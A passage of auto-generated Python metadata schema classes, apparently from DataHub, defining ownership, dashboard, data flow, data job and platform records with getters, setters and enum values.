self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
@classmethod
def construct_with_defaults(cls) -> "OwnershipClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.owners = list()
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
@property
def owners(self) -> List["OwnerClass"]:
"""Getter: List of owners of the entity."""
return self._inner_dict.get('owners') # type: ignore
@owners.setter
def owners(self, value: List["OwnerClass"]) -> None:
"""Setter: List of owners of the entity."""
self._inner_dict['owners'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: Audit stamp containing who last modified the record and when. A value of 0 in the time field indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp containing who last modified the record and when. A value of 0 in the time field indicates missing data."""
self._inner_dict['lastModified'] = value
class OwnershipSourceClass(DictWrapper):
"""Source/provider of the ownership information"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.OwnershipSource")
def __init__(self,
type: Union[str, "OwnershipSourceTypeClass"],
url: Union[None, str]=None,
):
super().__init__()
self.type = type
self.url = url
@classmethod
def construct_with_defaults(cls) -> "OwnershipSourceClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.type = OwnershipSourceTypeClass.AUDIT
self.url = self.RECORD_SCHEMA.field_map["url"].default
@property
def type(self) -> Union[str, "OwnershipSourceTypeClass"]:
"""Getter: The type of the source"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "OwnershipSourceTypeClass"]) -> None:
"""Setter: The type of the source"""
self._inner_dict['type'] = value
@property
def url(self) -> Union[None, str]:
"""Getter: A reference URL for the source"""
return self._inner_dict.get('url') # type: ignore
@url.setter
def url(self, value: Union[None, str]) -> None:
"""Setter: A reference URL for the source"""
self._inner_dict['url'] = value
class OwnershipSourceTypeClass(object):
# No docs available.
"""Auditing system or audit logs"""
AUDIT = "AUDIT"
"""Database, e.g. GRANTS table"""
DATABASE = "DATABASE"
"""File system, e.g. file/directory owner"""
FILE_SYSTEM = "FILE_SYSTEM"
"""Issue tracking system, e.g. Jira"""
ISSUE_TRACKING_SYSTEM = "ISSUE_TRACKING_SYSTEM"
"""Manually provided by a user"""
MANUAL = "MANUAL"
"""Other ownership-like service, e.g. Nuage, ACL service etc"""
SERVICE = "SERVICE"
"""SCM system, e.g. GIT, SVN"""
SOURCE_CONTROL = "SOURCE_CONTROL"
"""Other sources"""
OTHER = "OTHER"
class OwnershipTypeClass(object):
"""Owner category or owner role"""
"""A person or group that is in charge of developing the code"""
DEVELOPER = "DEVELOPER"
"""A person or group that is owning the data"""
DATAOWNER = "DATAOWNER"
"""A person or a group that overseas the operation, e.g. a DBA or SRE."""
DELEGATE = "DELEGATE"
"""A person, group, or service that produces/generates the data"""
PRODUCER = "PRODUCER"
"""A person, group, or service that consumes the data"""
CONSUMER = "CONSUMER"
"""A person or a group that has direct business interest"""
STAKEHOLDER = "STAKEHOLDER"
class StatusClass(DictWrapper):
"""The status metadata of an entity, e.g. dataset, metric, feature, etc."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.Status")
def __init__(self,
removed: Optional[bool]=None,
):
super().__init__()
if removed is None:
# default: False
self.removed = self.RECORD_SCHEMA.field_map["removed"].default
else:
self.removed = removed
@classmethod
def construct_with_defaults(cls) -> "StatusClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.removed = self.RECORD_SCHEMA.field_map["removed"].default
@property
def removed(self) -> bool:
"""Getter: whether the entity is removed or not"""
return self._inner_dict.get('removed') # type: ignore
@removed.setter
def removed(self, value: bool) -> None:
"""Setter: whether the entity is removed or not"""
self._inner_dict['removed'] = value
class TagAssociationClass(DictWrapper):
"""Properties of an applied tag. For now, just an Urn. In the future we can extend this with other properties, e.g.
propagation parameters."""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.TagAssociation")
def __init__(self,
tag: str,
):
super().__init__()
self.tag = tag
@classmethod
def construct_with_defaults(cls) -> "TagAssociationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.tag = str()
@property
def tag(self) -> str:
"""Getter: Urn of the applied tag"""
return self._inner_dict.get('tag') # type: ignore
@tag.setter
def tag(self, value: str) -> None:
"""Setter: Urn of the applied tag"""
self._inner_dict['tag'] = value
class VersionTagClass(DictWrapper):
"""A resource-defined string representing the resource state for the purpose of concurrency control"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.VersionTag")
def __init__(self,
versionTag: Union[None, str]=None,
):
super().__init__()
self.versionTag = versionTag
@classmethod
def construct_with_defaults(cls) -> "VersionTagClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.versionTag = self.RECORD_SCHEMA.field_map["versionTag"].default
@property
def versionTag(self) -> Union[None, str]:
# No docs available.
return self._inner_dict.get('versionTag') # type: ignore
@versionTag.setter
def versionTag(self, value: Union[None, str]) -> None:
# No docs available.
self._inner_dict['versionTag'] = value
class WindowDurationClass(object):
"""Enum to define the length of a bucket when doing aggregations"""
YEAR = "YEAR"
MONTH = "MONTH"
WEEK = "WEEK"
DAY = "DAY"
HOUR = "HOUR"
class TransformationTypeClass(object):
"""Type of the transformation involved in generating destination fields from source fields."""
"""Field transformation expressed as unknown black box function."""
BLACKBOX = "BLACKBOX"
"""Field transformation expressed as Identity function."""
IDENTITY = "IDENTITY"
class UDFTransformerClass(DictWrapper):
"""Field transformation expressed in UDF"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.common.fieldtransformer.UDFTransformer")
def __init__(self,
udf: str,
):
super().__init__()
self.udf = udf
@classmethod
def construct_with_defaults(cls) -> "UDFTransformerClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.udf = str()
@property
def udf(self) -> str:
"""Getter: A UDF mentioning how the source fields got transformed to destination field. This is the FQCN(Fully Qualified Class Name) of the udf."""
return self._inner_dict.get('udf') # type: ignore
@udf.setter
def udf(self, value: str) -> None:
"""Setter: A UDF mentioning how the source fields got transformed to destination field. This is the FQCN(Fully Qualified Class Name) of the udf."""
self._inner_dict['udf'] = value
class DashboardInfoClass(DictWrapper):
"""Information about a dashboard"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dashboard.DashboardInfo")
def __init__(self,
title: str,
description: str,
lastModified: "ChangeAuditStampsClass",
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
charts: Optional[List[str]]=None,
dashboardUrl: Union[None, str]=None,
access: Union[None, Union[str, "AccessLevelClass"]]=None,
lastRefreshed: Union[None, int]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.title = title
self.description = description
if charts is None:
# default: []
self.charts = list()
else:
self.charts = charts
self.lastModified = lastModified
self.dashboardUrl = dashboardUrl
self.access = access
self.lastRefreshed = lastRefreshed
@classmethod
def construct_with_defaults(cls) -> "DashboardInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.title = str()
self.description = str()
self.charts = list()
self.lastModified = ChangeAuditStampsClass.construct_with_defaults()
self.dashboardUrl = self.RECORD_SCHEMA.field_map["dashboardUrl"].default
self.access = self.RECORD_SCHEMA.field_map["access"].default
self.lastRefreshed = self.RECORD_SCHEMA.field_map["lastRefreshed"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def title(self) -> str:
"""Getter: Title of the dashboard"""
return self._inner_dict.get('title') # type: ignore
@title.setter
def title(self, value: str) -> None:
"""Setter: Title of the dashboard"""
self._inner_dict['title'] = value
@property
def description(self) -> str:
"""Getter: Detailed description about the dashboard"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: str) -> None:
"""Setter: Detailed description about the dashboard"""
self._inner_dict['description'] = value
@property
def charts(self) -> List[str]:
"""Getter: Charts in a dashboard"""
return self._inner_dict.get('charts') # type: ignore
@charts.setter
def charts(self, value: List[str]) -> None:
"""Setter: Charts in a dashboard"""
self._inner_dict['charts'] = value
@property
def lastModified(self) -> "ChangeAuditStampsClass":
"""Getter: Captures information about who created/last modified/deleted this dashboard and when"""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "ChangeAuditStampsClass") -> None:
"""Setter: Captures information about who created/last modified/deleted this dashboard and when"""
self._inner_dict['lastModified'] = value
@property
def dashboardUrl(self) -> Union[None, str]:
"""Getter: URL for the dashboard. This could be used as an external link on DataHub to allow users access/view the dashboard"""
return self._inner_dict.get('dashboardUrl') # type: ignore
@dashboardUrl.setter
def dashboardUrl(self, value: Union[None, str]) -> None:
"""Setter: URL for the dashboard. This could be used as an external link on DataHub to allow users access/view the dashboard"""
self._inner_dict['dashboardUrl'] = value
@property
def access(self) -> Union[None, Union[str, "AccessLevelClass"]]:
"""Getter: Access level for the dashboard"""
return self._inner_dict.get('access') # type: ignore
@access.setter
def access(self, value: Union[None, Union[str, "AccessLevelClass"]]) -> None:
"""Setter: Access level for the dashboard"""
self._inner_dict['access'] = value
@property
def lastRefreshed(self) -> Union[None, int]:
"""Getter: The time when this dashboard last refreshed"""
return self._inner_dict.get('lastRefreshed') # type: ignore
@lastRefreshed.setter
def lastRefreshed(self, value: Union[None, int]) -> None:
"""Setter: The time when this dashboard last refreshed"""
self._inner_dict['lastRefreshed'] = value
class EditableDashboardPropertiesClass(DictWrapper):
"""Stores editable changes made to properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dashboard.EditableDashboardProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableDashboardPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Edited documentation of the dashboard"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Edited documentation of the dashboard"""
self._inner_dict['description'] = value
class DataFlowInfoClass(DictWrapper):
"""Information about a Data processing flow"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.DataFlowInfo")
def __init__(self,
name: str,
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
description: Union[None, str]=None,
project: Union[None, str]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.name = name
self.description = description
self.project = project
@classmethod
def construct_with_defaults(cls) -> "DataFlowInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.name = str()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.project = self.RECORD_SCHEMA.field_map["project"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def name(self) -> str:
"""Getter: Flow name"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Flow name"""
self._inner_dict['name'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Flow description"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Flow description"""
self._inner_dict['description'] = value
@property
def project(self) -> Union[None, str]:
"""Getter: Optional project/namespace associated with the flow"""
return self._inner_dict.get('project') # type: ignore
@project.setter
def project(self, value: Union[None, str]) -> None:
"""Setter: Optional project/namespace associated with the flow"""
self._inner_dict['project'] = value
class DataJobInfoClass(DictWrapper):
"""Information about a Data processing job"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.DataJobInfo")
def __init__(self,
name: str,
type: Union[Union[str, "AzkabanJobTypeClass"], str],
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
description: Union[None, str]=None,
flowUrn: Union[None, str]=None,
status: Union[None, Union[str, "JobStatusClass"]]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.name = name
self.description = description
self.type = type
self.flowUrn = flowUrn
self.status = status
@classmethod
def construct_with_defaults(cls) -> "DataJobInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.name = str()
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.type = AzkabanJobTypeClass.COMMAND
self.flowUrn = self.RECORD_SCHEMA.field_map["flowUrn"].default
self.status = self.RECORD_SCHEMA.field_map["status"].default
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def name(self) -> str:
"""Getter: Job name"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Job name"""
self._inner_dict['name'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Job description"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Job description"""
self._inner_dict['description'] = value
@property
def type(self) -> Union[Union[str, "AzkabanJobTypeClass"], str]:
"""Getter: Datajob type
**NOTE**: AzkabanJobType is deprecated. Please use strings instead."""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[Union[str, "AzkabanJobTypeClass"], str]) -> None:
"""Setter: Datajob type
**NOTE**: AzkabanJobType is deprecated. Please use strings instead."""
self._inner_dict['type'] = value
@property
def flowUrn(self) -> Union[None, str]:
"""Getter: DataFlow urn that this job is part of"""
return self._inner_dict.get('flowUrn') # type: ignore
@flowUrn.setter
def flowUrn(self, value: Union[None, str]) -> None:
"""Setter: DataFlow urn that this job is part of"""
self._inner_dict['flowUrn'] = value
@property
def status(self) -> Union[None, Union[str, "JobStatusClass"]]:
"""Getter: Status of the job"""
return self._inner_dict.get('status') # type: ignore
@status.setter
def status(self, value: Union[None, Union[str, "JobStatusClass"]]) -> None:
"""Setter: Status of the job"""
self._inner_dict['status'] = value
class DataJobInputOutputClass(DictWrapper):
"""Information about the inputs and outputs of a Data processing job"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.DataJobInputOutput")
def __init__(self,
inputDatasets: List[str],
outputDatasets: List[str],
inputDatajobs: Union[None, List[str]]=None,
):
super().__init__()
self.inputDatasets = inputDatasets
self.outputDatasets = outputDatasets
self.inputDatajobs = inputDatajobs
@classmethod
def construct_with_defaults(cls) -> "DataJobInputOutputClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.inputDatasets = list()
self.outputDatasets = list()
self.inputDatajobs = self.RECORD_SCHEMA.field_map["inputDatajobs"].default
@property
def inputDatasets(self) -> List[str]:
"""Getter: Input datasets consumed by the data job during processing"""
return self._inner_dict.get('inputDatasets') # type: ignore
@inputDatasets.setter
def inputDatasets(self, value: List[str]) -> None:
"""Setter: Input datasets consumed by the data job during processing"""
self._inner_dict['inputDatasets'] = value
@property
def outputDatasets(self) -> List[str]:
"""Getter: Output datasets produced by the data job during processing"""
return self._inner_dict.get('outputDatasets') # type: ignore
@outputDatasets.setter
def outputDatasets(self, value: List[str]) -> None:
"""Setter: Output datasets produced by the data job during processing"""
self._inner_dict['outputDatasets'] = value
@property
def inputDatajobs(self) -> Union[None, List[str]]:
"""Getter: Input datajobs that this data job depends on"""
return self._inner_dict.get('inputDatajobs') # type: ignore
@inputDatajobs.setter
def inputDatajobs(self, value: Union[None, List[str]]) -> None:
"""Setter: Input datajobs that this data job depends on"""
self._inner_dict['inputDatajobs'] = value
class EditableDataFlowPropertiesClass(DictWrapper):
"""Stores editable changes made to properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.EditableDataFlowProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableDataFlowPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Edited documentation of the data flow"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Edited documentation of the data flow"""
self._inner_dict['description'] = value
class EditableDataJobPropertiesClass(DictWrapper):
"""Stores editable changes made to properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.datajob.EditableDataJobProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableDataJobPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Edited documentation of the data job """
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Edited documentation of the data job """
self._inner_dict['description'] = value
class JobStatusClass(object):
"""Job statuses"""
"""Jobs being initialized."""
STARTING = "STARTING"
"""Jobs currently running."""
IN_PROGRESS = "IN_PROGRESS"
"""Jobs being stopped."""
STOPPING = "STOPPING"
"""Jobs that have stopped."""
STOPPED = "STOPPED"
"""Jobs with successful completion."""
COMPLETED = "COMPLETED"
"""Jobs that have failed."""
FAILED = "FAILED"
"""Jobs with unknown status (either unmappable or unavailable)"""
UNKNOWN = "UNKNOWN"
class AzkabanJobTypeClass(object):
"""The various types of support azkaban jobs"""
"""The command job type is one of the basic built-in types. It runs multiple UNIX commands using java processbuilder.
Upon execution, Azkaban spawns off a process to run the command."""
COMMAND = "COMMAND"
"""Runs a java program with ability to access Hadoop cluster.
https://azkaban.readthedocs.io/en/latest/jobTypes.html#java-job-type"""
HADOOP_JAVA = "HADOOP_JAVA"
"""In large part, this is the same Command type. The difference is its ability to talk to a Hadoop cluster
securely, via Hadoop tokens."""
HADOOP_SHELL = "HADOOP_SHELL"
"""Hive type is for running Hive jobs."""
HIVE = "HIVE"
"""Pig type is for running Pig jobs."""
PIG = "PIG"
"""SQL is for running Presto, mysql queries etc"""
SQL = "SQL"
"""Glue type is for running AWS Glue job transforms."""
GLUE = "GLUE"
class DataPlatformInfoClass(DictWrapper):
"""Information about a data platform"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataplatform.DataPlatformInfo")
def __init__(self,
name: str,
type: Union[str, "PlatformTypeClass"],
datasetNameDelimiter: str,
displayName: Union[None, str]=None,
logoUrl: Union[None, str]=None,
):
super().__init__()
self.name = name
self.displayName = displayName
self.type = type
self.datasetNameDelimiter = datasetNameDelimiter
self.logoUrl = logoUrl
@classmethod
def construct_with_defaults(cls) -> "DataPlatformInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
self.displayName = self.RECORD_SCHEMA.field_map["displayName"].default
self.type = PlatformTypeClass.FILE_SYSTEM
self.datasetNameDelimiter = str()
self.logoUrl = self.RECORD_SCHEMA.field_map["logoUrl"].default
@property
def name(self) -> str:
"""Getter: Name of the data platform"""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: Name of the data platform"""
self._inner_dict['name'] = value
@property
def displayName(self) -> Union[None, str]:
"""Getter: The name that will be used for displaying a platform type."""
return self._inner_dict.get('displayName') # type: ignore
@displayName.setter
def displayName(self, value: Union[None, str]) -> None:
"""Setter: The name that will be used for displaying a platform type."""
self._inner_dict['displayName'] = value
@property
def type(self) -> Union[str, "PlatformTypeClass"]:
"""Getter: Platform type this data platform describes"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "PlatformTypeClass"]) -> None:
"""Setter: Platform type this data platform describes"""
self._inner_dict['type'] = value
@property
def datasetNameDelimiter(self) -> str:
"""Getter: The delimiter in the dataset names on the data platform, e.g. '/' for HDFS and '.' for Oracle"""
return self._inner_dict.get('datasetNameDelimiter') # type: ignore
@datasetNameDelimiter.setter
def datasetNameDelimiter(self, value: str) -> None:
"""Setter: The delimiter in the dataset names on the data platform, e.g. '/' for HDFS and '.' for Oracle"""
